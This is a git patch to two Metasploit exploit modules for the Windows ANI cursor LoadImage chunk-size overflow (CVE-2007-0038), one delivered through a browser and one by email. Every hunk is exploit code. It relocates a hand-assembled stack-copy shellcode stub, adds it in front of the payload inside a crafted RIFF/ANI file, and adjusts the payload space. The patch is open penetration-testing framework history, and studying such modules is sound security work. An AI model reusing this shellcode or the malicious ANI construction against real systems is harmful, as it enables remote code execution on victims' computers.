From b2ff98b4e90c3050c0c1f9f31d0a85f618f27acd Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Mon, 2 Apr 2007 05:42:27 +0000
Subject: [PATCH] Fixed the copy-to-stack stub, should work great now

git-svn-id: file:///home/svn/framework3/trunk@4610 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../browser/ani_loadimage_chunksize.rb        | 35 ++++++++++---------
 .../windows/email/ani_loadimage_chunksize.rb  | 33 +++++++++--------
 2 files changed, 37 insertions(+), 31 deletions(-)

diff --git a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
index fc0a962d7b..be5ed83ed5 100644
--- a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
@@ -66,20 +66,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 						{
 							'ConnectionType' => '-find',
 						},
-					'PrependEncoder' =>
-						# Our ANI file is randomly placed into a read-only segment, the only reliable
-						# solution is to copy our payload back to the stack and execute it there. This
-						# is non-optimal and should be replaced soon.
-							"\xeb\x0f"+              # jmp _end
-							"\x68\x70\x17\x00\x00"+  # push 6000
-							"\x59"+                  # pop ecx
-							"\x5e"+                  # pop esi
-							"\x29\xcc"+              # sub esp, ecx
-							"\x89\xe7"+              # mov edi, esp
-							"\xf3\xa4"+              # rep movsb
-							"\xff\xe4"+              # jmp esp
-							"\xe8\xec\xff\xff\xff",  # call _start
-													
+							
 					'StackAdjustment' => -3500,
 				},
 			'Platform'       => 'win',
@@ -308,9 +295,25 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 			# payload itself which comes after the riff chunk
 			riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
 		end
-
+		
+		# Our ANI file is randomly placed into a read-only segment, the only reliable
+		# solution is to copy our payload back to the stack and execute it there. This
+		# is non-optimal and should be replaced soon.
+		copier =
+			"\xeb\x13"+              # jmp _end
+			"\x68\x00\x04\x00\x00"+  # push 1024
+			"\x59"+                  # pop ecx
+			"\x5e"+                  # pop esi
+			"\x29\xcc"+              # sub esp, ecx
+			"\x89\xe7"+              # mov edi, esp
+			"\xf3\xa4"+              # rep movsb
+			"\x89\xe3"+              # mov ebx, esp
+			"\x29\xcc"+              # sub esp, ecx
+			"\xff\xe3"+              # jmp ebx
+			"\xe8\xe8\xff\xff\xff"   # call _start
+			
 		# Place the RIFF chunk in front and off we go
-		ret = "RIFF" + [riff.length].pack('V') + riff + payload.encoded
+		ret = "RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded
 	end
 
 	# Generates a riff chunk with the first bytes of the data being a relative
diff --git a/modules/exploits/windows/email/ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ani_loadimage_chunksize.rb
index f6aabd321c..410b58b926 100644
--- a/modules/exploits/windows/email/ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/email/ani_loadimage_chunksize.rb
@@ -57,25 +57,12 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 				},
 			'Payload'        =>
 				{
-					'Space'       => 4000 + (rand(1000)),
+					'Space'       => 1024,
 					'MinNops'     => 32,
 					'Compat'      => 
 						{
 							'ConnectionType' => '-bind -find',
 						},
-					'PrependEncoder' =>
-						# Our ANI file is randomly placed into a read-only segment, the only reliable
-						# solution is to copy our payload back to the stack and execute it there. This
-						# is non-optimal and should be replaced soon.
-							"\xeb\x0f"+              # jmp _end
-							"\x68\x70\x17\x00\x00"+  # push 6000
-							"\x59"+                  # pop ecx
-							"\x5e"+                  # pop esi
-							"\x29\xcc"+              # sub esp, ecx
-							"\x89\xe7"+              # mov edi, esp
-							"\xf3\xa4"+              # rep movsb
-							"\xff\xe4"+              # jmp esp
-							"\xe8\xec\xff\xff\xff",  # call _start
 					
 					'StackAdjustment' => -3500,
 				},
@@ -293,8 +280,24 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 			riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
 		end
 
+		# Our ANI file is randomly placed into a read-only segment, the only reliable
+		# solution is to copy our payload back to the stack and execute it there. This
+		# is non-optimal and should be replaced soon.
+		copier =
+			"\xeb\x13"+              # jmp _end
+			"\x68\x00\x04\x00\x00"+  # push 1024
+			"\x59"+                  # pop ecx
+			"\x5e"+                  # pop esi
+			"\x29\xcc"+              # sub esp, ecx
+			"\x89\xe7"+              # mov edi, esp
+			"\xf3\xa4"+              # rep movsb
+			"\x89\xe3"+              # mov ebx, esp
+			"\x29\xcc"+              # sub esp, ecx
+			"\xff\xe3"+              # jmp ebx
+			"\xe8\xe8\xff\xff\xff"   # call _start
+									
 		# Place the RIFF chunk in front and off we go
-		ret = "RIFF" + [riff.length].pack('V') + riff + payload.encoded
+		ret = "RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded
 	end
 
 	# Generates a riff chunk with the first bytes of the data being a relative